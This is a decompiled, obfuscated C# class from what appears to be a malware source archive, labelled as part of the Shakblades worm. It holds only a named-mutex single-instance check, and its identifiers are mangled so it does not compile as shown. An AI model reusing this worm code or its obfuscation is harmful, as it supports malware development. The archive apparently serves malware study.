MalwareSourceCode/MSIL/Worm/Win32/S/Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f/཈ಡભ᭻.cs

33 lines
1.0 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: Ҧ߲๒ʽ໙ୄᴘ.཈ಡભ᭻
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
using System.Threading;
namespace Ҧ߲ʽ
{
internal class \u0F48ಡભ\u1B7B
{
private static Mutex ;
public static bool Π\u1AE1\u0F0E\u0BF1 => !\u0F48ಡભ\u1B7B..WaitOne(0, false);
public static void \u1393\u001Aኬ\u1AFB\u0A77(string _param0)
{
if (\u0F48ಡભ\u1B7B. != null)
return;
\u0F48ಡભ\u1B7B. = new Mutex(false, _param0);
}
public static void Ԩص()
{
if (\u0F48ಡભ\u1B7B. == null)
return;
\u0F48ಡભ\u1B7B..Close();
\u0F48ಡભ\u1B7B. = (Mutex) null;
}
}
}